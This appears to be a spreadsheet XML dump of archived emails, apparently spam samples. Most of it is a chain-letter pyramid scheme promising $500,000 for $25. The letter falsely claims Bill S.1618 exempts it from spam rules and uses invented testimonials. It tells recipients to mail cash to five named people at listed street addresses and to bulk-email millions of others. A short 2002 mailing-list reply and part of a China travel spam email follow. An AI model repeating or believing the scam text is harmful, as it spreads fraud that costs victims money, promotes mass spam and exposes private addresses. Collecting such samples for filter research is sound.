   &lt;o:CharactersWithSpaces&gt;14814&lt;/o:CharactersWithSpaces&gt;
   &lt;o:Version&gt;9.2720&lt;/o:Version&gt;
  &lt;/o:DocumentProperties&gt;
 &lt;/xml&gt;&lt;![endif]--&gt;
 &lt;STYLE&gt;@font-face {
 	font-family: Space Toaster;
 }
 @page Section1 {size: 8.5in 11.0in; margin: 1.0in 1.25in 1.0in 1.25in; mso-header-margin: .5in; mso-footer-margin: .5in; mso-paper-source: 0; }
 P.MsoNormal {
 	FONT-SIZE: 12pt; MARGIN: 0in 0in 0pt; FONT-FAMILY: "Times New Roman"; mso-fareast-font-family: "Times New Roman"; mso-style-parent: ""; mso-pagination: widow-orphan
 }
 LI.MsoNormal {
 	FONT-SIZE: 12pt; MARGIN: 0in 0in 0pt; FONT-FAMILY: "Times New Roman"; mso-fareast-font-family: "Times New Roman"; mso-style-parent: ""; mso-pagination: widow-orphan
 }
 DIV.MsoNormal {
 	FONT-SIZE: 12pt; MARGIN: 0in 0in 0pt; FONT-FAMILY: "Times New Roman"; mso-fareast-font-family: "Times New Roman"; mso-style-parent: ""; mso-pagination: widow-orphan
 }
 A:link {
 	COLOR: blue; TEXT-DECORATION: underline; text-underline: single
 }
 SPAN.MsoHyperlink {
 	COLOR: blue; TEXT-DECORATION: underline; text-underline: single
 }
 A:visited {
 	COLOR: purple; TEXT-DECORATION: underline; text-underline: single
 }
 SPAN.MsoHyperlinkFollowed {
 	COLOR: purple; TEXT-DECORATION: underline; text-underline: single
 }
 SPAN.font041 {
 	mso-bidi-font-size: 12.0pt; mso-style-name: font041; mso-ansi-font-size: 12.0pt
 }
 DIV.Section1 {
 	page: Section1
 }
 &lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY lang=EN-US style="tab-interval: .5in" vLink=purple link=blue&gt;
 &lt;DIV class=Section1&gt;
 &lt;P class=MsoNormal&gt;&lt;B&gt;&lt;SPAN 
 style="FONT-SIZE: 14pt; mso-bidi-font-size: 12.0pt"&gt;Easy to make "Between 
 $200,000 and $500,000 every seven months&lt;BR&gt;&lt;/SPAN&gt;&lt;/B&gt;&lt;BR&gt;***Under Bill S.1618 
 TITLE III passed by the 105&lt;SUP&gt;th&lt;/SUP&gt; U.S. Congress this letter Can Not be 
 Considered Spam as long as we include the way to be 
 removed.&lt;BR&gt;&lt;BR&gt;//////////////////////////////////////////////////////////////////////////////&lt;BR&gt;This 
 message is sent in compliance with the new e-mail bill: SECTION 301. Sender: 
 "Per Section 301, Paragraph (a)(2)(C) of S. 1618, further transmissions to you 
 by sender of this email may be stopped, at no cost to you, by sending a reply to 
 this email address with the word "remove" in the subject 
 line."&lt;BR&gt;///////////////////////////////////////////////////////////////////////////////&lt;BR&gt;&lt;BR&gt;&lt;B&gt;&lt;SPAN 
 style="FONT-SIZE: 24pt; COLOR: blue; FONT-FAMILY: 'Space Toaster'; mso-bidi-font-size: 12.0pt"&gt;Dear 
 Friends&lt;/SPAN&gt;&lt;SPAN style="COLOR: blue"&gt; &lt;BR&gt;&lt;/SPAN&gt;&lt;/B&gt;&lt;BR&gt;AS SEEN ON NATIONAL 
 TV:&lt;SPAN style="mso-spacerun: yes"&gt;&amp;nbsp; &lt;/SPAN&gt;Making over half million 
 dollars every 4 to 5 months from your home for an investment of only $25 U.S. 
 Dollars expense one time THANK'S TO THE COMPUTER AGE AND THE INTERNET 
 !&lt;BR&gt;&lt;BR&gt;==================================================&lt;BR&gt;&lt;BR&gt;&lt;B&gt;&lt;SPAN 
 style="COLOR: blue"&gt;BE IN GOOD MONEY WITHIN A YEAR!!!&lt;BR&gt;&lt;/SPAN&gt;&lt;/B&gt;&lt;BR&gt;Before 
 you say ''Bull'', please read the following. This is the letter you have been 
 hearing about on the news lately. Due to the popularity of this letter on the 
 Internet, a national weekly news program recently devoted an entire show to the 
 investigation of this program described below, to see if it really can make 
 people money. The show also investigated whether or not the program was 
 legal.&lt;BR&gt;&lt;BR&gt;Their findings proved once and for all that there are ''absolutely 
 NO Laws prohibiting the participation in the program and if people can -follow 
 the simple instructions, they are bound to make some money with only $25 out of 
 pocket cost''. &lt;BR&gt;&lt;BR&gt;DUE TO THE RECENT INCREASE OF POPULARITY &amp;amp; RESPECT 
 THIS PROGRAM HAS ATTAINED,&lt;SPAN style="mso-spacerun: yes"&gt;&amp;nbsp; &lt;/SPAN&gt;IT IS 
 CURRENTLY WORKING BETTER THAN EVER.&lt;BR&gt;&lt;BR&gt;This is what one had to say: 
 &lt;BR&gt;&lt;BR&gt;"I was approached many times before but each time I passed on it. I am 
 so glad I finally joined just to see what one could expect in return for the 
 minimal effort and money required. To my astonishment, I received total 
 $610,470.00 in 21 weeks, with money still coming in." &lt;BR&gt;&lt;BR&gt;Pam Hedland, Fort 
 Lee, New 
 Jersey.&lt;BR&gt;&lt;BR&gt;===================================================&lt;BR&gt;&lt;BR&gt;Here 
 is another testimonial: &lt;BR&gt;&lt;BR&gt;"This program has been around for a long time 
 but I never believed in it. But one day when I received it again in the mail I 
 decided to gamble my $25 on it. I followed the simple instructions and walaa 
 .... 3 weeks later the money started to come in. &lt;BR&gt;&lt;BR&gt;&amp;nbsp;The first month 
 I only made $240.00 but the next 2 months after that I made a total of 
 $290,000.00. So far, in the past 8 months by re-entering the program, I have 
 made over $710,000.00 and I am playing it again. The key to success in this 
 program is to follow the simple steps and NOT change anything."&lt;BR&gt;&lt;BR&gt;More 
 testimonials later but first,&lt;BR&gt;&lt;BR&gt;===== PRINT THIS NOW FOR YOUR FUTURE 
 REFERENCE 
 ======&lt;BR&gt;$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$&lt;BR&gt;If 
 you would like to make at least $500,000 every 4 to 5 months easily 
 and&lt;BR&gt;comfortably, please read the following...THEN READ IT AGAIN and 
 AGAIN!!!&lt;BR&gt;$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$&lt;BR&gt;&lt;BR&gt;FOLLOW 
 THE SIMPLE INSTRUCTION BELOW AND YOUR FINANCIAL DREAMS WILL COME TRUE, 
 GUARANTEED! &lt;BR&gt;&lt;BR&gt;&lt;B&gt;INSTRUCTIONS:&lt;BR&gt;&lt;/B&gt;&lt;BR&gt;&lt;SPAN 
 style="COLOR: blue"&gt;=====Order all 5 reports shown on the list below 
 =====&lt;BR&gt;&lt;/SPAN&gt;&lt;B&gt;For each report, send $5 CASH, THE NAME &amp;amp; NUMBER OF THE 
 REPORT&lt;BR&gt;YOU ARE ORDERING and YOUR E-MAIL ADDRESS to the person whose name 
 appears ON THAT LIST next to the report. MAKE SURE YOUR RETURN ADDRESS IS ON 
 YOUR ENVELOPE TOP LEFT CORNER in case of any mail problems.&lt;BR&gt;&lt;/B&gt;&lt;BR&gt;=== When 
 you place your order, make sure you order each of the 5 reports.&lt;SPAN 
 style="mso-spacerun: yes"&gt;&amp;nbsp; &lt;/SPAN&gt;You will need all 5 reports so that you 
 can save them on your computer and resell them. YOUR TOTAL COST $5 X 
 5=$25.00.&lt;BR&gt;&lt;BR&gt;Within a few days you will receive, via e-mail, each of the 5 
 reports from these 5 different individuals. Save them on your computer so they 
 will be accessible for you to send to the 1,000's of people who will order them 
 from you. Also make a floppy of these reports and keep it on your desk in case 
 something happens to your computer.&lt;BR&gt;&lt;BR&gt;IMPORTANT - DO NOT alter the names of 
 the people who are listed next to each report, or their sequence on the list, in 
 any way other than what is instructed below in step '' 1 through 6 '' or you 
 will lose out on a majority of your profits. Once you understand the way this 
 works, you will also see how it does not work if you change it. Remember, this 
 method has been tested, and if you alter it, it will NOT work !!! People have 
 tried to put their friends/relatives names on all five thinking they could get 
 all the money. But it does not work this way. Believe us, we all have tried to 
 be greedy and then nothing happened. So Do Not try to change anything other than 
 what is instructed. Because if you do, it will not work for you.&lt;SPAN 
 style="mso-spacerun: yes"&gt;&amp;nbsp; &lt;/SPAN&gt;Remember, honesty reaps the 
 reward!!!&lt;BR&gt;&lt;BR&gt;1.... After you have ordered all 5 reports, take this 
 advertisement and REMOVE the name &amp;amp; address of the person in REPORT # 5. 
 This person has made it through the cycle and is no doubt counting their 
 fortune.&lt;BR&gt;&lt;BR&gt;2.... Move the name &amp;amp; address in REPORT # 4 down TO REPORT # 
 5.&lt;BR&gt;&lt;BR&gt;3.... Move the name &amp;amp; address in REPORT # 3 down TO REPORT # 
 4.&lt;BR&gt;&lt;BR&gt;4.... Move the name &amp;amp; address in REPORT # 2 down TO REPORT # 
 3.&lt;BR&gt;&lt;BR&gt;5.... Move the name &amp;amp; address in REPORT # 1 down TO REPORT # 
 2&lt;BR&gt;&lt;BR&gt;6.... &lt;B&gt;&lt;SPAN style="COLOR: blue"&gt;Insert YOUR name &amp;amp; address in 
 the REPORT # 1 Position.&lt;/SPAN&gt;&lt;/B&gt;&lt;SPAN style="COLOR: blue"&gt; &lt;B&gt;PLEASE 
 MAKE&lt;BR&gt;SURE you copy every name &amp;amp; address 
 ACCURATELY!&lt;BR&gt;&lt;/B&gt;&lt;/SPAN&gt;&lt;BR&gt;==========================================================&lt;BR&gt;&lt;BR&gt;**** 
 Take this entire letter, with the modified list of names, and save it on your 
 computer. DO NOT MAKE ANY OTHER CHANGES.&lt;BR&gt;&lt;BR&gt;Save this on a disk as well just 
 in case if you loose any data. To assist you with marketing your business on the 
 internet, the 5 reports you purchase will provide you with invaluable marketing 
 information which includes how to send bulk e-mails legally, where to find 
 thousands of free classified ads and much more. There are 2 Primary methods to 
 get this venture going:&lt;BR&gt;&lt;BR&gt;METHOD # 1: BY SENDING BULK E-MAIL 
 LEGALLY&lt;BR&gt;==========================================================&lt;BR&gt;Let's 
 say that you decide to start small, just to see how it goes, and we will assume 
 You and those involved send out only 5,000 e-mails each. Let's also assume that 
 the mailing receive only a 0.2% response (the response could be much better but 
 lets just say it is only 0.2%. Also many people will send out hundreds of 
 thousands e-mails instead of only 5,000 each).&lt;BR&gt;Continuing with this example, 
 you send out only 5,000 e-mails. With a 0.2% response, that is only 10 orders 
 for report # 1. &lt;BR&gt;&lt;BR&gt;Those 10 people responded by sending out 5,000 e-mail 
 each for a total of 50,000. Out of those 50,000 e-mails only 0.2% responded with 
 orders. That's=100 people responded and ordered Report # 2.&lt;BR&gt;&lt;BR&gt;Those 100 
 people mail out 5,000 e-mails each for a total of 500,000 e-mails.&lt;SPAN 
 style="mso-spacerun: yes"&gt;&amp;nbsp; &lt;/SPAN&gt;The 0.2% response to that is 1000 orders 
 for Report # 3.&lt;BR&gt;&lt;BR&gt;Those 1000 people send out 5,000 e-mails each for a total 
 of 5 million e-mails sent out. The 0.2% response to that is 10,000 orders for 
 Report # 4.&lt;BR&gt;&lt;BR&gt;Those 10,000 people send out 5,000 e-mails each for a total 
 of 50,000,000 (50 million) e-mails. The 0.2% response to that is 100,000 orders 
 for Report #5 &lt;BR&gt;&lt;BR&gt;THAT'S 100,000 ORDERS TIMES $5 EACH=$500,000.00 (half 
 million).&lt;BR&gt;Your total income in this example is: &lt;BR&gt;1..... $50 + 2..... $500 
 + 3..... $5,000 + 4.... $50,000 + 5..... $500,000&amp;nbsp; &lt;/P&gt;
 &lt;P class=MsoNormal&gt;Grand Total=$555,550.00&lt;BR&gt;&lt;BR&gt;NUMBERS DO NOT LIE. GET A 
 PENCIL &amp;amp; PAPER AND FIGURE OUT THE WORST POSSIBLE RESPONSES AND NO MATTER HOW 
 YOU CALCULATE IT, YOU WILL STILL MAKE A LOT OF MONEY 
 !&lt;BR&gt;&lt;BR&gt;=========================================================&lt;BR&gt;&lt;BR&gt;REMEMBER 
 FRIENDS, THIS IS ASSUMING ONLY 10 PEOPLE ORDERING OUT OF 5,000 YOU MAILED 
 TO.&lt;SPAN style="mso-spacerun: yes"&gt;&amp;nbsp; &lt;/SPAN&gt;Dare to think for a moment what 
 would happen if everyone or half or even one 4th of those people mailed 100,000 
 e-mails each or more? There are over 150 million people on the Internet 
 worldwide and counting. Believe me, many people will do just that, and 
 more!&lt;BR&gt;&lt;BR&gt;METHOD #2: BY PLACING FREE ADS ON THE 
 INTERNET&lt;BR&gt;=======================================================&lt;BR&gt;Advertising 
 on the net is very very inexpensive and there are hundreds of FREE places to 
 advertise. Placing a lot of free ads on the Internet will easily get a larger 
 response. We strongly suggest you start with Method # 1 and add METHOD # 2 as 
 you go along. For every $5 you receive, all you must do is e-mail them the 
 Report they ordered. That's it. Always provide same day service on all orders. 
 This will guarantee that the e-mail they send out, with your name and address on 
 it, will be prompt because they can not advertise until they receive the 
 report.&lt;BR&gt;&lt;BR&gt;=========== AVAILABLE REPORTS ====================&lt;BR&gt;ORDER EACH 
 REPORT BY ITS NUMBER &amp;amp; NAME ONLY. Notes: Always send $5 cash (U.S. CURRENCY) 
 for each Report. Checks NOT accepted. Make sure the cash is concealed by 
 wrapping it in at least 2 sheets of paper. On one of those sheets of paper, 
 Write the NUMBER &amp;amp; the NAME of the Report you are ordering, YOUR E-MAIL 
 ADDRESS and your name and postal address.&lt;BR&gt;&lt;BR&gt;PLACE YOUR ORDER FOR THESE 
 REPORTS NOW!!&lt;BR&gt;====================================================&lt;BR 
 style="mso-special-character: line-break"&gt;&lt;![if !supportLineBreakNewLine]&gt;&lt;BR 
 style="mso-special-character: line-break"&gt;&lt;![endif]&gt;&lt;/P&gt;&lt;SPAN 
 style="FONT-SIZE: 12pt; FONT-FAMILY: 'Times New Roman'; mso-fareast-font-family: 'Times New Roman'; mso-ansi-language: EN-US; mso-fareast-language: EN-US; mso-bidi-language: AR-SA"&gt;&lt;BR 
 style="PAGE-BREAK-BEFORE: always" clear=all&gt;&lt;/SPAN&gt;
 &lt;P class=MsoNormal&gt;&lt;BR&gt;&lt;B&gt;REPORT # 1: The Insider's Guide to Advertising for 
 Free on the Net&lt;BR&gt;&lt;/B&gt;&lt;BR&gt;Order Report #1 from:&lt;BR&gt;B.H.&lt;BR&gt;218 Timberwood&lt;BR&gt;Irvine, 
 Cal&lt;SPAN style="mso-spacerun: yes"&gt;&amp;nbsp; &lt;/SPAN&gt;92620&lt;/P&gt;
 &lt;P 
 class=MsoNormal&gt;USA&lt;/P&gt;
 &lt;P class=MsoNormal&gt;&lt;BR&gt;&lt;SPAN 
 style="mso-spacerun: yes"&gt;&amp;nbsp;&lt;/SPAN&gt;________________________________________________________&lt;BR&gt;&lt;B&gt;REPORT 
 # 2: The Insider's Guide to Sending Bulk E-mail on the Net&lt;BR&gt;&lt;/B&gt;&lt;BR&gt;Order 
 Report # 2 from:&lt;BR&gt;&lt;SPAN style="mso-spacerun: yes"&gt;&amp;nbsp;&lt;/SPAN&gt;J.B. 
 Erhart&lt;BR&gt;722 10th Street&lt;BR&gt;Paso Robles, CA. 
 93446&lt;BR&gt;USA&lt;BR&gt;_________________________________________________________________&lt;BR&gt;&lt;B&gt;REPORT 
 # 3: Secrets to Multilevel Marketing on the Net&lt;BR&gt;&lt;/B&gt;&lt;BR&gt;Order Report # 3 
 from:&lt;BR&gt;S.W.&lt;BR&gt;131 E. Eden&lt;BR&gt;Fresno, Cal. 
 93706&lt;BR&gt;USA&lt;BR&gt;______________________________________________________________&lt;BR&gt;&lt;B&gt;REPORT 
 # 4: &lt;SPAN class=font041&gt;How to Achieve Financial Independence in a Global 
 Economy&lt;/SPAN&gt;&lt;BR style="mso-special-character: line-break"&gt;&lt;![if !supportLineBreakNewLine]&gt;&lt;BR 
 style="mso-special-character: line-break"&gt;&lt;![endif]&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/B&gt;&lt;/P&gt;
 &lt;P class=MsoNormal&gt;Order Report # 4 from:&lt;BR&gt;F.L.&lt;/P&gt;
 &lt;P class=MsoNormal&gt;225 Bridlecreek Park S.W.&lt;/P&gt;
 &lt;P class=MsoNormal&gt;Calgary, Alberta, CA&lt;/P&gt;
 &lt;P class=MsoNormal&gt;T2Y 3P1&lt;/P&gt;
 &lt;P class=MsoNormal&gt;&lt;BR&gt;________________________________________________________________&lt;BR&gt;&lt;B&gt;REPORT 
 #5: How to Send Out 0ne Million Emails For Free&lt;BR&gt;&lt;/B&gt;&lt;BR&gt;Order Report # 5 
 from:&lt;/P&gt;
 &lt;P class=MsoNormal&gt;K.H.&lt;/P&gt;
 &lt;P class=MsoNormal&gt;2025 Red River Road&lt;/P&gt;
 &lt;P class=MsoNormal&gt;Sykesville, MD&lt;SPAN style="mso-spacerun: yes"&gt;&amp;nbsp; 
 &lt;/SPAN&gt;21784&lt;/P&gt;
 &lt;P 
 class=MsoNormal&gt;USA&lt;BR&gt;&lt;BR&gt;________________________________________________________________________&lt;BR 
 style="mso-special-character: line-break"&gt;&lt;![if !supportLineBreakNewLine]&gt;&lt;BR 
 style="mso-special-character: line-break"&gt;&lt;![endif]&gt;&lt;/P&gt;&lt;SPAN 
 style="FONT-SIZE: 12pt; FONT-FAMILY: 'Times New Roman'; mso-fareast-font-family: 'Times New Roman'; mso-ansi-language: EN-US; mso-fareast-language: EN-US; mso-bidi-language: AR-SA"&gt;&lt;BR 
 style="PAGE-BREAK-BEFORE: always" clear=all&gt;&lt;/SPAN&gt;
 &lt;P class=MsoNormal&gt;&lt;BR&gt;&lt;B&gt;&lt;SPAN style="COLOR: blue"&gt;$$$$$$$$$ YOUR SUCCESS 
 GUIDELINES $$$$$$$$$$$&lt;BR&gt;&lt;/SPAN&gt;&lt;/B&gt;&lt;BR&gt;Follow these guidelines to guarantee 
 your success:&lt;BR&gt;&lt;BR&gt;=== If you do not receive at least 10 orders for Report #1 
 within 2 weeks, continue sending e-mails until you do.&lt;BR&gt;&lt;BR&gt;=== After you have 
 received 10 orders, 2 to 3 weeks after that you should receive 100 orders or 
 more for REPORT # 2. If you did not, continue advertising or sending e-mails 
 until you do.&lt;BR&gt;&lt;BR&gt;=== Once you have received 100 or more orders for Report # 
 2, YOU CAN RELAX, because the system is already working for you, and the cash 
 will continue to roll in ! THIS IS IMPORTANT TO REMEMBER: Every time your name 
 is moved down on the list, you are placed in front of a Different 
 report.&lt;BR&gt;&lt;BR&gt;You can KEEP TRACK of your PROGRESS by watching which report 
 people are ordering from you. IF YOU WANT TO GENERATE MORE INCOME SEND ANOTHER 
 BATCH OF E-MAILS AND START THE WHOLE PROCESS AGAIN.&lt;SPAN 
 style="mso-spacerun: yes"&gt;&amp;nbsp; &lt;/SPAN&gt;There is NO LIMIT to the income you can 
 generate from this business 
 !!!&lt;BR&gt;&lt;BR&gt;======================================================&lt;BR&gt;&lt;BR&gt;FOLLOWING 
 IS A NOTE FROM THE ORIGINATOR OF THIS PROGRAM: &lt;BR&gt;&lt;BR&gt;You have just received 
 information that can give you financial freedom for the rest of your life, with 
 NO RISK and JUST A LITTLE BIT OF EFFORT. You can make more money in the next few 
 weeks and months than you have ever imagined. Follow the program EXACTLY AS 
 INSTRUCTED. Do Not change it in any way. It works exceedingly well as it is 
 now.&lt;BR&gt;&lt;BR&gt;Remember to e-mail a copy of this exciting report after you have put 
 your name and address in Report #1 and moved others to #2 ...........# 5 as 
 instructed above. One of the people you send this to may send out 100,000 or 
 more e-mails and your name will be on every one of them.&lt;SPAN 
 style="mso-spacerun: yes"&gt;&amp;nbsp; &lt;/SPAN&gt;Remember though, the more you send out 
 the more potential customers you will reach. So my friend, I have given you the 
 ideas, information, materials and opportunity to become financially independent. 
 IT IS UP TO YOU NOW !&lt;BR&gt;&lt;BR&gt;============ MORE TESTIMONIALS 
 ================&lt;BR&gt;&lt;BR&gt;"My name is Mitchell. My wife, Jody and I live in 
 Chicago. I am an accountant with a major U.S. Corporation and I make pretty good 
 money. When I received this program I grumbled to Jody about receiving ''junk 
 mail''. I made fun of the whole thing,spouting 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received total $ 
 147,200.00 ........... all cash! I was shocked. I have joined Jody in her 
 ''hobby''.&lt;SPAN style="mso-spacerun: yes"&gt;&amp;nbsp; &lt;/SPAN&gt;Mitchell Wolf M.D., 
 Chicago, 
 Illinois&lt;BR&gt;&lt;BR&gt;======================================================&lt;BR&gt;&lt;BR&gt;''Not 
 being the gambling type, it took several weeks to make up my mind to participate 
 in this plan. But conservative that I am, I decided that the initial investment 
 was so little that there was just no way that I wouldn't get enough orders to at 
 least get my money back''. '' I was surprised when I found my medium size post 
 office box crammed with orders. I made $319,210.00in the first 12 weeks. The 
 nice thing about this deal is that it does not matter where people live. There 
 simply isn't a better investment with a faster return and so big."&lt;SPAN 
 style="mso-spacerun: yes"&gt;&amp;nbsp; &lt;/SPAN&gt;Dan Sondstrom, Alberta, 
 Canada&lt;BR&gt;&lt;BR&gt;=======================================================&lt;BR&gt;&lt;BR&gt;''I 
 had received this program before. I deleted it, but later I wondered if I should 
 have given it a try. Of course, I had no idea who to contact to get another 
 copy, so I had to wait until I was e-mailed again by someone else.........11 
 months passed then it luckily came again...... I did not delete this one! I made 
 more than $490,000 on my first try and all the money came within 22 weeks."&lt;SPAN 
 style="mso-spacerun: yes"&gt;&amp;nbsp; &lt;/SPAN&gt;Susan De Suza, New York, 
 N.Y.&lt;BR&gt;&lt;BR&gt;=======================================================&lt;BR&gt;&lt;BR&gt;''It 
 really is a great opportunity to make relatively easy money with little cost to 
 you. I followed the simple instructions carefully and within 10 days the money 
 started to come in. My first month I made $20,560.00 and by the end of third 
 month my total cash count was $362,840.00. Life is beautiful, Thanx to 
 internet.".&lt;SPAN style="mso-spacerun: yes"&gt;&amp;nbsp; &lt;/SPAN&gt;Fred Dellaca, Westport, 
 New 
 Zealand&lt;BR&gt;&lt;BR&gt;=======================================================&lt;BR&gt;&lt;B&gt;&lt;I&gt;&lt;SPAN 
 style="FONT-SIZE: 14pt; mso-bidi-font-size: 12.0pt"&gt;ORDER YOUR REPORTS TODAY AND 
 GET STARTED ON&lt;BR&gt;'YOUR' ROAD TO FINANCIAL FREEDOM 
 !&lt;BR&gt;&lt;/SPAN&gt;&lt;/I&gt;&lt;/B&gt;&lt;BR&gt;&lt;BR&gt;&lt;SPAN 
 style="mso-spacerun: yes"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;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</si>
  <si>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MacOS X (Re: [SAtalk] [OT] Habeas-talk (was: 2.40 RELEASE: oops
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 27 Aug 2002 the voices made Matt Sergeant write:
 &gt; I've got 6C115 (I think) the current developer release (though not the same
 &gt; as gold).
  The only difference AFAIK is the path to a single helpfile, which we don't use
 anyways, right? *G*
 	/Tony
 PS I also have a problem with that stupid helpprogram crasching whenever I
 search for "windows"; not sure if that's a feature or not. =)
 -- 
 # Per scientiam ad libertatem! // Through knowledge towards freedom! #
 # Genom kunskap mot frihet! =*= (c) 1999-2002 tony@svanstrom.com =*= #
      perl -e'print$_{$_} for sort%_=`lynx -dump svanstrom.com/t`'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</si>
  <si>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Valuable Business Information Of China
</t>
  </si>
  <si>
    <t xml:space="preserve">
 This is a multi-part message in MIME format
 --717fbb98-2427-46fa-b1fc-01aeb8d47c3f
 Content-Type: text/html; charset=gb2312
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Travel to China,Welcome to China business travel!&lt;/title&gt;
 &lt;META name=3D"description" content=3D"specializing in business and personal =
 travel services to China."&gt;
 &lt;META name=3D"keywords" content=3D"business travel,china business =
 travel,china travel,china business,china,business,travel,an agent for travel =
 to China, provide China travel service, act as China travel guide,for China =
 busieness, help doing business in China=A3=ACChina Olympics, China 2008, =
 traveling, travel, air, airfare, cruises, affordable, Asia, East, China, =
 Chinese, Tibet, Tibetan, Mongolia, Mongolian, minority regions, ancient silk =
 road, Beijing, Xian, Guilin, Hangzhou, Nanjing, Wuxi, Kunming, Guangzhou, =
 Bangkok, Singapore, Bali, Tokyo, Kuala Lumpur, Hong Kong, Guangzhou, Foshan, =
 Zhongshan, Macau, Shenzhen, Foshan, Zhaoqing, Shanghai, Hothot, Kashgar, =
 Urumqi, Dunhuang, Harbin, Jiayuguan, Qingdao, Luoyang, Chngdu, Leshan, Lhasa, =
 Chongqing, Yangtze River, Xishuangbanna, Suzhou, Hangzhou, Sanya, Huang =
 Guoshu, Wuhan, Huangshan"&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dgb2312"&gt;
 &lt;style type=3D"text/css"&gt;
 &lt;!--
 A.a01 {  font-size: 11px; color: 487EB3; text-decoration: underline; =
 font-family: "Arial", "Helvetica", "sans-serif"}
 A.a01:hover {  color: #FF9900}
 A.a02 {  font-size: 12px; font-weight: bold; color: D3E4F2; text-decoration: =
 none; font-family: "Arial", "Helvetica", "sans-serif"}
 A.a02:hover {  color: A6C7E8}
 .p12 {  font-size: 12px; font-family: "Arial", "Helvetica", "sans-serif"}
 td {  font-size: 11px; font-family: "Arial", "Helvetica", "sans-serif"}
 a {  color: #333333; text-decoration: none; line-height: 140%; font-family: =
 "Arial", "Helvetica", "sans-serif"}
 a:hover {  color: #476FA5; text-decoration: underline}
 .p11 {  font-size: 11px; color: #666666; line-height: 110%}
 select {  font-size: 11px; font-family: "Arial", "Helvetica", "sans-serif"}
 --&gt;
 &lt;/style&gt;
 &lt;script language=3D"JavaScript"&gt;
 &lt;!--
 function MM_jumpMenu(targ,selObj,restore){ //v3.0
   eval(targ+".location=3D'"+selObj.options[selObj.selectedIndex].value+"'");
   if (restore) selObj.selectedIndex=3D0;
 }
 //--&gt;
 &lt;/script&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000" leftmargin=3D"0"&gt;
 &lt;p&gt;&lt;font face=3D"Lucida Sans"&gt;&lt;span lang=3D"EN-US"&gt;We are an agency =
 specializing  
 in business and personal travel services to China. If you want to take any =
 activity in China, please contact us. We will try our best to offer you the =
 top services.  
 If this email bothers you, please forgive us. We sincerely hope you will  
 consider using our services. &lt;/span&gt;&lt;/font&gt;&lt;span lang=3D"EN-US" style=3D=
 "font-family:Arial"&gt;&lt;o:p&gt; 
 &amp;nbsp;
 &lt;/span&gt;&lt;/p&gt;
 &lt;table width=3D"720" border=3D"0" cellspacing=3D"0" cellpadding=3D"0" align=3D=
 "center"&gt;
   &lt;tr valign=3D"bottom"&gt; 
     &lt;td&gt;&lt;a href=3D"http://www.china-business-travel.com/index.html"&gt;&lt;img =
 src=3D"http://www.china-business-travel.com/images/logo.gif" border=3D"0" =
 width=3D"298" height=3D"34"&gt;&lt;/a&gt;&lt;/td&gt;
     &lt;td align=3D"right"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/info.jpg" width=3D"249" height=3D=
 "34" border=3D"0" usemap=3D"#Map"&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D"720" border=3D"0" cellspacing=3D"0" cellpadding=3D"0" align=3D=
 "center" bgcolor=3D"487EB3"&gt;
   &lt;tr&gt; 
     &lt;td width=3D"42"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/corner1.gif" width=3D"42" =
 height=3D"24" border=3D"0"&gt;&lt;/td&gt;
     &lt;td align=3D"center" width=3D"95"&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/biztour/index.html" class=3D"a02"&gt;BIZ 
       Tour&lt;/a&gt;&lt;/td&gt;                     
     &lt;td&gt;&lt;img src=3D"http://www.china-business-travel.com/images/vline1.gif" =
 width=3D"7" height=3D"24" border=3D"0"&gt;&lt;/td&gt;
     &lt;td align=3D"center" width=3D"115"&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/bizconsult/index.html" class=3D=
 "a02"&gt;BIZ 
       Consulting&lt;/a&gt;&lt;/td&gt;
     &lt;td&gt;&lt;img src=3D"http://www.china-business-travel.com/images/vline1.gif" =
 width=3D"7" height=3D"24" border=3D"0"&gt;&lt;/td&gt;
     &lt;td width=3D"120" align=3D"center"&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/packages/index.html" class=3D"a02"&gt;Tour =
       Packages&lt;/a&gt;&lt;/td&gt;
     &lt;td&gt;&lt;img src=3D"http://www.china-business-travel.com/images/vline1.gif" =
 width=3D"7" height=3D"24" border=3D"0"&gt;&lt;/td&gt;
     &lt;td width=3D"145" align=3D"center"&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/adventure/index.html" class=3D=
 "a02"&gt;China 
       Adventure&lt;/a&gt;&lt;/td&gt;
     &lt;td&gt;&lt;img src=3D"http://www.china-business-travel.com/images/vline1.gif" =
 width=3D"7" height=3D"24" border=3D"0"&gt;&lt;/td&gt;
     &lt;td width=3D"135" align=3D"center"&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/customized/index.html" class=3D=
 "a02"&gt;Customized 
       Tour&lt;/a&gt;&lt;/td&gt;
     &lt;td width=3D"42" align=3D"right"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/corner2.gif" width=3D"42" =
 height=3D"24" border=3D"0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D"720" border=3D"0" cellspacing=3D"0" cellpadding=3D"0" align=3D=
 "center"&gt;
   &lt;tr&gt; 
     &lt;td width=3D"192" background=3D"images/bg1.gif" valign=3D"top"&gt; 
       &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" cellpadding=3D"0"&gt;
 =
         &lt;tr&gt; 
           &lt;td&gt;&lt;img src=3D=
 "http://www.chinabusinesstravel.com/images/line1.jpg" width=3D"192" height=3D=
 "3" border=3D"0"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/line2.jpg" width=3D"192" =
 height=3D"25" border=3D"0"&gt;&lt;/td&gt;
